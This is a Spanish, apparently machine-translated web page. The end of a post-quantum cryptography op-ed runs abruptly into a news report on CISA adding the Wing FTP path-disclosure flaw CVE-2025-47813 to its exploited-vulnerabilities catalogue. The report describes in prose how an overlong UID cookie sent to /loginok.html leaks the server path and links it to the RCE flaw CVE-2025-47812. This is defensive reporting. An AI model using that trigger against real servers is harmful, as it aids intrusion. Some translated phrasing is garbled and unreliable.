Aún persistirán muchas vulnerabilidades, razón por la cual el argumento comercial para PQC incluye proteger los datos de los clientes y salvaguardar la reputación y la confianza en la marca a medida que las amenazas digitales evolucionan rápidamente. Incluso hoy en día, una infracción importante puede costar millones y causar daños duraderos a una marca corporativa.

La computación cuántica promete aportar muchas capacidades nuevas a las empresas y la sociedad, desde transformar la optimización de la cadena de suministro y el análisis de riesgos hasta permitir descubrimientos revolucionarios en medicina y ciencia climática. Pero los riesgos potenciales son igualmente sustanciales. Después de años de observar y esperar la tecnología cuántica, los líderes empresariales no tienen más remedio que tomar medidas.

Chris Hickman es el director de seguridad de Keyfactor, un proveedor líder de soluciones de seguridad cuánticas.

La Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. (CISA) el lunes agregado una falla de seguridad de gravedad media que afecta a Wing FTP a sus vulnerabilidades explotadas conocidas (KEV) catálogo, citando evidencia de explotación activa.

La vulnerabilidad, CVE-2025-47813 (Puntuación CVSS: 4,3), es una vulnerabilidad de divulgación de información que filtra la ruta de instalación de la aplicación bajo ciertas condiciones.

«Wing FTP Server contiene una generación de mensajes de error que contienen vulnerabilidades de información confidencial cuando se utiliza un valor largo en la cookie UID», dijo CISA.

La deficiencia afecta a todas las versiones del software anteriores a la versión 7.4.3 incluida. El problema se solucionó en la versión 7.4.4, enviada en mayo luego de una divulgación responsable por parte del investigador de seguridad de RCE, Julien Ahrens.

Vale la pena señalar que la versión 7.4.4 también parchea CVE-2025-47812 (puntaje CVSS: 10.0), otro error crítico en el mismo producto que permite la ejecución remota de código. En julio de 2025, la vulnerabilidad se encuentra bajo explotación activa en la naturaleza.

Según los detalles compartidos por Huntress en ese momento, los atacantes lo aprovecharon para descargar y ejecutar archivos Lua maliciosos, realizar reconocimientos e instalar software de administración y monitoreo remoto.

Ahrens, en un exploit de prueba de concepto (PoC), compartido en GitHub, señaló que el punto final en «/loginok.html» no valida adecuadamente el valor de la cookie de sesión «UID». Como resultado, si el valor proporcionado es más largo que el tamaño de ruta máximo del sistema operativo subyacente, genera un mensaje de error que revela la ruta completa del servidor local.

«Los exploits exitosos pueden permitir que un atacante autenticado obtenga la ruta del servidor local de la aplicación, lo que puede ayudar a explotar vulnerabilidades como CVE-2025-47812», el investigador agregado.

Actualmente no hay detalles sobre cómo se explota la vulnerabilidad en la naturaleza y si se abusa de ella junto con CVE-2025-47812. A la luz de los últimos acontecimientos, se recomienda a las agencias del Poder Ejecutivo Civil Federal (FCEB) que apliquen las correcciones necesarias antes del 30 de marzo de 2026.